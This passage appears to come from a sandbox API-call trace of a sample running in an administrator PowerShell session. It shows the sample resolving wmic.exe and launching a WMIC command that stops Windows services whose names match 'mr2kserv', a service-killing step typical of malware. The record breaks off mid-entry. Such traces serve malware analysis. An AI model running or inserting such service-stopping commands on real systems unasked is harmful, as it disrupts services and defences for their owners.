[0251.398] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.398] SetErrorMode (uMode=0x1) returned 0x1 [0251.398] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.398] SetErrorMode (uMode=0x1) returned 0x1 [0251.399] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.399] SetErrorMode (uMode=0x1) returned 0x1 [0251.399] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.399] SetErrorMode (uMode=0x1) returned 0x1 [0251.399] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.400] SetErrorMode (uMode=0x1) returned 0x1 [0251.400] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.400] SetErrorMode (uMode=0x1) returned 0x1 [0251.400] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.401] SetErrorMode (uMode=0x1) returned 0x1 [0251.401] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.401] SetErrorMode (uMode=0x1) returned 0x1 [0251.401] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.401] SetErrorMode (uMode=0x1) returned 0x1 [0251.402] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.402] SetErrorMode (uMode=0x1) returned 0x1 [0251.402] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.402] SetErrorMode (uMode=0x1) returned 0x1 [0251.402] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.403] SetErrorMode (uMode=0x1) returned 0x1 [0251.403] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.403] SetErrorMode (uMode=0x1) returned 0x1 [0251.403] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.404] SetErrorMode (uMode=0x1) returned 0x1 [0251.404] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.405] SetErrorMode (uMode=0x1) returned 0x1 [0251.405] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.405] SetErrorMode (uMode=0x1) returned 0x1 [0251.405] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.406] SetErrorMode (uMode=0x1) returned 0x1 [0251.406] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.406] SetErrorMode (uMode=0x1) returned 0x1 [0251.406] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.406] SetErrorMode (uMode=0x1) returned 0x1 [0251.407] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.407] SetErrorMode (uMode=0x1) returned 0x1 [0251.407] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.407] SetErrorMode (uMode=0x1) returned 0x1 [0251.407] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.408] SetErrorMode (uMode=0x1) returned 0x1 [0251.408] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.408] SetErrorMode (uMode=0x1) returned 0x1 [0251.408] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.408] SetErrorMode (uMode=0x1) returned 0x1 [0251.408] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.409] SetErrorMode (uMode=0x1) returned 0x1 [0251.409] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.409] SetErrorMode (uMode=0x1) returned 0x1 [0251.409] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.410] SetErrorMode (uMode=0x1) returned 0x1 [0251.410] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0251.410] SetErrorMode (uMode=0x1) returned 0x1 [0251.410] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.410] SetErrorMode (uMode=0x1) returned 0x1 [0251.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0251.411] SetErrorMode (uMode=0x1) returned 0x1 [0251.411] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.411] SetErrorMode (uMode=0x1) returned 0x1 [0251.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0251.411] SetErrorMode (uMode=0x1) returned 0x1 [0251.411] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.412] SetErrorMode (uMode=0x1) returned 0x1 [0251.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0251.412] SetErrorMode (uMode=0x1) returned 0x1 [0251.412] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.412] SetErrorMode (uMode=0x1) returned 0x1 [0251.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0251.413] SetErrorMode (uMode=0x1) returned 0x1 [0251.413] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0251.413] SetErrorMode (uMode=0x1) returned 0x1 [0251.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0251.413] SetErrorMode (uMode=0x1) returned 0x1 [0251.414] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c9cd580 | out: lpFindFileData=0x1c9cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0251.414] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c9cd590 | out: lpFindFileData=0x1c9cd590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0251.414] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0251.414] SetErrorMode (uMode=0x1) returned 0x1 [0251.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c9cd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0251.415] SetErrorMode (uMode=0x1) returned 0x1 [0251.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9cd8b0 | out: lpFileInformation=0x1c9cd8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0251.415] SetErrorMode (uMode=0x1) returned 0x1 [0251.415] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0251.415] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9cda98, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9cda98) returned 0x4550 [0251.417] CoTaskMemFree (pv=0x1b9b1010) [0251.417] GetConsoleWindow () returned 0x5011e [0251.417] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0251.417] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0251.417] CoTaskMemFree (pv=0x2af8c0) [0251.418] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0251.418] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0251.418] CoTaskMemFree (pv=0x2af8c0) [0251.418] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice", pNumArgs=0x1c9cdae0 | out: pNumArgs=0x1c9cdae0) returned 0x1ee760*="" [0251.418] lstrlenW (lpString="path") returned 4 [0251.418] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa7d0 [0251.418] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9aa7d0) [0251.418] CoTaskMemFree (pv=0x1b9aa7d0) [0251.418] lstrlenW (lpString="Win32_Service") returned 13 [0251.418] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0251.418] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0251.418] CoTaskMemFree (pv=0x1b9b1010) [0251.418] lstrlenW (lpString="where") returned 5 [0251.418] CoTaskMemAlloc (cb=0xe) returned 0x1b9aa7d0 [0251.418] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9aa7d0) [0251.418] CoTaskMemFree (pv=0x1b9aa7d0) [0251.418] lstrlenW (lpString="name like '%%mr2kserv%%'") returned 24 [0251.418] CoTaskMemAlloc (cb=0x34) returned 0x1b9c7170 [0251.419] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x32 | out: Destination=0x1b9c7170) [0251.419] CoTaskMemFree (pv=0x1b9c7170) [0251.419] lstrlenW (lpString="call") returned 4 [0251.419] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa7d0 [0251.419] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee806, Length=0xa | out: Destination=0x1b9aa7d0) [0251.419] CoTaskMemFree (pv=0x1b9aa7d0) [0251.419] lstrlenW (lpString="stopservice") returned 11 [0251.419] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0251.419] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee810, Length=0x18 | out: Destination=0x1b9b1010) [0251.419] CoTaskMemFree (pv=0x1b9b1010) [0251.419] LocalFree (hMem=0x1ee760) returned 0x0 [0251.420] CoTaskMemAlloc (cb=0x804) returned 0x1b9dfcd0 [0251.420] GetConsoleTitleW (in: lpConsoleTitle=0x1b9dfcd0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0251.420] CoTaskMemFree (pv=0x1b9dfcd0) [0251.420] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0251.420] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c9cda40*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32195c0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice", lpProcessInformation=0x32195c0*(hProcess=0x760, hThread=0x75c, dwProcessId=0x5e4, dwThreadId=0xb18)) returned 1 [0251.426] CoTaskMemFree (pv=0x253f20) [0251.426] CloseHandle (hObject=0x75c) returned 1 [0251.426] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0251.426] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9cdae8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9cdae8) returned 0x4550 [0251.427] CoTaskMemFree (pv=0x1b9b1010) [0251.427] GetCurrentProcess () returned 0xffffffffffffffff [0251.427] GetCurrentProcess () returned 0xffffffffffffffff [0251.427] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x760, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9cdbc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9cdbc8*=0x75c) returned 1 [0253.290] CloseHandle (hObject=0x75c) returned 1 [0253.290] GetExitCodeProcess (in: hProcess=0x760, lpExitCode=0x1c9cdc38 | out: lpExitCode=0x1c9cdc38*=0x0) returned 1 [0253.290] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0253.291] CloseHandle (hObject=0x760) returned 1 [0253.292] SetEvent (hEvent=0x72c) returned 1 [0253.292] SetEvent (hEvent=0x720) returned 1 [0253.292] SetEvent (hEvent=0x724) returned 1 [0253.292] SetEvent (hEvent=0x728) returned 1 [0253.292] SetEvent (hEvent=0x73c) returned 1 [0253.292] SetEvent (hEvent=0x730) returned 1 [0253.292] SetEvent (hEvent=0x734) returned 1 [0253.292] SetEvent (hEvent=0x738) returned 1 [0253.292] SetEvent (hEvent=0x740) returned 1 [0253.293] CoUninitialize () Thread: id = 214 os_tid = 0xb40 [0253.390] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0253.395] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0253.396] VirtualQuery (in: lpAddress=0x1c88d1a0, lpBuffer=0x1c88e060, dwLength=0x30 | out: lpBuffer=0x1c88e060*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0253.399] VirtualQuery (in: lpAddress=0x1c88d450, lpBuffer=0x1c88e310, dwLength=0x30 | out: lpBuffer=0x1c88e310*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0253.403] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0253.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0253.403] CoTaskMemFree (pv=0x2af8c0) [0253.403] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0253.404] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0253.404] CoTaskMemFree (pv=0x2af8c0) [0253.405] CoTaskMemAlloc (cb=0x20e) returned 0x2bcf60 [0253.405] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bcf60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0253.405] CoTaskMemFree (pv=0x2bcf60) [0253.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.406] SetErrorMode (uMode=0x1) returned 0x1 [0253.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 